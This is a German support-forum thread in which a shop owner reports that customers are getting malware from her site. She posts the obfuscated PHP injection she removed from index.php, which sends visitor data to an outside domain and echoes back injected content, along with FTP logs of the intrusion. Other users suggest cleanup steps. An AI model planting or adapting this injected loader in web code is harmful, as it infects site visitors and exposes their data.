Probleme mit Malware . . .

KathiLe

Sehr aktives Mitglied
31. August 2009
2.899
8
Hallo,

habe von einer Kundin gestern morgen folgende Mitteilung erhalten:

> Vielen Dank für die Zusendung des Kleids und der anderen Teile.
> mir ist aufgefallen, dass ich nach Besuch Ihrer Website sogenannte
> Malware
> (Trojaner) auf meinem Computer hatte. Nach Bereinigung durch meinen
> IT-Fachmann, hatte ich sofort wieder die gleichen Trojaner auf meinem
> Computer, als ich auf Ihre Website ging. Könnten Sie Ihre Seite bitte
> überprüfen lassen, da anscheinend jemand dort bösartige Software
> versteckt hat.
> Gibt es eine Möglichkeit, seitens HostEurope meine Daten zu scannen?
> Vielen Dank für eine schnelle Rückmeldung und viele Grüße

Auf Anfrage teilte mir Hosteurope dann folgendes mit:

In der index.php findet sich ab Zeile 178/179 etwas seltsamer Code. Zumindest gibt es base64-codierten Quelltext welcher hier vermutlcih nicht hingehört. Innerhalb dieses Codes wird ab

http://botstatisticupdate.com/stat/stat.php

zugegriffen (Zeile 190). Wenn Ihnen diese Domain nichts sagt, ist das vermutlich der Schadcode.

Wir haben Ihnen die FTP-Logfileauszüge der letzten 7 Tage in das Root Verzeichnis Ihres Webpacks gelegt. Sie können diese Daten per FTP abrufen.

Wenn dieser Link da nicht hingehört - wo kommt der her und kann ich den einfach in der index.php löschen, ohne dass er wieder auftaucht?
 

MBesancon

Administrator
Mitarbeiter
1. Oktober 2010
2.056
188
Erkelenz
AW: Probleme mit Malware . . .

Du solltest deine FTP-Passwörter ändern. Möglicherweise kam es über diesen Weg.

Auf jeden Fall gehört dieser Code NICHT in die Datei und sollte sofort entfernt werden!
 

Freaky

Sehr aktives Mitglied
7. Mai 2009
1.298
99
AW: Probleme mit Malware . . .

Was sagt denn der Shopdateien-Check? Der müsste doch da was festgestellt haben oder?
 

KathiLe

Sehr aktives Mitglied
31. August 2009
2.899
8
AW: Probleme mit Malware . . .

Nee, der hat nichts außergewöhnliches entdeckt.
Ich habe jetzt folgenden Code aus der index.php entfernt:

<?phpif (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL2JvdHN0YXRpc3RpY3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>

Und die log-Datei von Hosteurope zeigte mir folgendes an:

Auszug der Transferlogs zum FTP-Account 1160504:
RETR ftp1160504-203484 - 184.173.19.183-static.reverse.softlayer.com [26/Mar/2012:16:07:03 +0200] "-"
RETR ftp1160504-203484 - 184.173.19.183-static.reverse.softlayer.com [26/Mar/2012:16:07:03 +0200] "-"
RETR ftp1160504-203484 7480 184.173.19.183-static.reverse.softlayer.com [26/Mar/2012:16:07:05 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/cap/index.php"
STOR ftp1160504-203484 7542 184.173.19.183-static.reverse.softlayer.com [26/Mar/2012:16:07:05 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/cap/index.php"
RETR ftp1160504-203484 7480 184.173.19.183-static.reverse.softlayer.com [26/Mar/2012:16:07:06 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/jtb/index.php"
STOR ftp1160504-203484 7542 184.173.19.183-static.reverse.softlayer.com [26/Mar/2012:16:07:07 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/jtb/index.php"
RETR ftp1160504-203484 - 184.173.19.183-static.reverse.softlayer.com [29/Mar/2012:17:42:24 +0200] "-"
RETR ftp1160504-203484 - 184.173.19.183-static.reverse.softlayer.com [29/Mar/2012:17:42:25 +0200] "-"
RETR ftp1160504-203484 7542 184.173.19.183-static.reverse.softlayer.com [29/Mar/2012:17:42:26 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/cap/index.php"
STOR ftp1160504-203484 7546 184.173.19.183-static.reverse.softlayer.com [29/Mar/2012:17:42:27 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/cap/index.php"
RETR ftp1160504-203484 7542 184.173.19.183-static.reverse.softlayer.com [29/Mar/2012:17:42:28 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/jtb/index.php"
STOR ftp1160504-203484 7546 184.173.19.183-static.reverse.softlayer.com [29/Mar/2012:17:42:29 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/jtb/index.php"

Betrifft also unsere beiden Shops - wer bitte ist "softlayer"?
 

ag-websolutions.de

Sehr aktives Mitglied
29. Dezember 2009
14.548
232
AW: Probleme mit Malware . . .

ich würde es nicht bei einer Bereinigung der index.php belassen....

sichere die config.ini.php und das template-verzeichnis und setze den shop neu auf ...

wenn nämlich in anderen dateien noch schadcode steckt ... ist dein shop ratz fat wieder infiziert

denke auch daran sämtliche Kennwörter zu ändern (shop-datenbank, ftp-zugang, shop-admin)
 
Ähnliche Themen
Titel Forum Antworten Datum
Probleme beim Export mit der Ameise JTL-Wawi 1.7 1
Neu Immense Probleme mit dem Aufschalten neuer Produkte Amazon-Anbindung - Fehler und Bugs 0
Probleme mit Versandbenachrichtigung versenden JTL-Wawi 1.9 0
Neu Probleme mit PayPal-Plugin: Bestellungen "pending" & doppelte Zahlungen nach Direktzahlung Plugins für JTL-Shop 0
Probleme beim Versand mit DHL JTL-Wawi 1.9 0
Neu Probleme mit Größenreihenfolge beim CSV-Import User helfen Usern - Fragen zu JTL-Wawi 2
Neu Probleme mit Varianten dann Stückliste und beim Hinzufügen ist dann schluss JTL-Wawi - Fehler und Bugs 7
Neu Probleme beim Versand von Newslettern über JTL Shop 5 Allgemeine Fragen zu JTL-Shop 0
Neu Probleme Anbindung DHL Geschäftskundenportal JTL-ShippingLabels - Ideen, Lob und Kritik 2
Neu Probleme beim Einrichten von GLS Paket JTL-ShippingLabels - Ideen, Lob und Kritik 5
Aktuelle technische Probleme beim Rechnungsdatenservice 2.0 Störungsmeldungen 0
Neu Probleme DHL Express National JTL-ShippingLabels - Fehler und Bugs 0
Probleme beim Einloggen JTL-Wawi App 6
Neu Probleme beim Update von 5.2.4 auf 5.3.3 Installation / Updates von JTL-Shop 6
Welche GPSR Plugin-Einstellungen mit WaWi 1.9.6.1 JTL-Wawi 1.9 4
Neu Artikelimport bricht mit Fehlermeldung ab JTL-Ameise - Fehler und Bugs 2
Neu LS-POS mit COM-Port in RDP Sitzung langsam Fragen rund um LS-POS 0
WAWi Workflows mit Zahlungen als Bedingung funktioniert nicht JTL-Workflows - Fehler und Bugs 0
Neu Verdandliste Pro Paket das Gewicht mit ausgeben Druck-/ E-Mail-/ Exportvorlagen in JTL-Wawi 1
Neu Paternoster Umlaufregal mit JTL Wawi möglich? JTL-WMS / JTL-Packtisch+ - Ideen, Lob und Kritik 0
Neu Aufträge mit nicht verfügbaren Artikeln automatisch zurückhalten User helfen Usern - Fragen zu JTL-Wawi 2
Neu WooCommerce Connector Problem mit nachträglich abgebrochenen Bestellungen Onlineshop-Anbindung 0
Neu Überverkäufe mit Kindartikeln - wie richtig einstellen ? User helfen Usern - Fragen zu JTL-Wawi 23
Neu Problem mit Variationen-Artikeln JTL-Shop - Fehler und Bugs 2
Neu WMS - Nachträglicher Labeldruck mit Adressänderung Arbeitsabläufe in JTL-WMS / JTL-Packtisch+ 1
Neu Connector Verhalten mit Tracking Nummern und Versandbestätigungen Shopify-Connector 0
Neu OTTO-Marketplace Versand NICHT mit DHL möglich? Smalltalk 4
Neu Frage an die (Hobby-) Controller: B2C Einzelhandel mit 6% Marketingbudget - das ist normal? Business Jungle 7
Neu Probeme WaWi mit POS verbinden - failed to connect - server IP 127.0.0.1 Einrichtung / Updates von JTL-POS 0
Neu Aufträge mit falsche Steuerart angelegt User helfen Usern - Fragen zu JTL-Wawi 0
Neu Wawi Auftrag in JTL POS öffnen (problem mit Kartenzahlung) Allgemeine Fragen zu JTL-POS 0
Neu Wie erstelle ich Bundles mit JTL Wawi? User helfen Usern 1
Auftrag Inlandskunde mit USt-Id - wie erfassen JTL-Wawi 1.7 6
Konfigurationsartikel mit 0 € vs. Preise der einzelnen Komponenten mit 0 € Einrichtung JTL-Shop5 1
Neu Zahlungsart Überweisung mit Skonto Allgemeine Fragen zu JTL-Shop 1
Neu Übersicht Verkauf mit Artikelmenge und durchschnittlichem VK netto Eigene Übersichten in der JTL-Wawi 6
Neu Artikel mit negativem Preis (Gutschein) eingeben kompliziert...geht das einfacher? Allgemeine Fragen zu JTL-POS 3
Neu Shop 5.4 - Error 500 mit aktiviertem JTL Debug JTL-Shop - Fehler und Bugs 8
Neu Preisdarstellung mit der niedrigsten Staffelung Allgemeine Fragen zu JTL-Shop 5
Neu Plugin mit transparentem Hintergrund (Auswahlassistent) Plugins für JTL-Shop 1
Neu Umgang mit Chargen bei mehreren Bestellungen Arbeitsabläufe in JTL-WMS / JTL-Packtisch+ 0
Neu SQL DB läuft mit Fehler voll und crasht Server JTL-Shop - Fehler und Bugs 1
Neu Fehler mit Zugriff auf die Datenbank (Exec Direct). Installation von JTL-Wawi 4
Neu In Filiale umbuchen mit Packungsgröße und dort mit JTL-POS einzeln "verkaufen" User helfen Usern - Fragen zu JTL-Wawi 3
Neu Fehler 500 mit NOVAchild 5.3.1 in JTL-Shop 5.33 Templates für JTL-Shop 2
Neu Neueste Version Paypal Checkout: Rechnungskauf mit Ratepay und Paypal-Kreditkarte sind nicht verfügbar. Plugins für JTL-Shop 21
Neu SW 5.7.18: welcher Connector mit welcher Wawi? Shopware-Connector 1
Neu JTL FEHLER! - JTL sendet falschen ISO-Code - Nordirland Versand mit DHL nicht mehr möglich JTL-ShippingLabels - Fehler und Bugs 5
Neu Workflow Auftragssplit bei DHL Export Sendungen mit mehreren Paketen User helfen Usern - Fragen zu JTL-Wawi 0
Neu Artikelexport mit Filter Hersteller, Überverkauf, letzte Änderung JTL Ameise - Eigene Exporte 2

Ähnliche Themen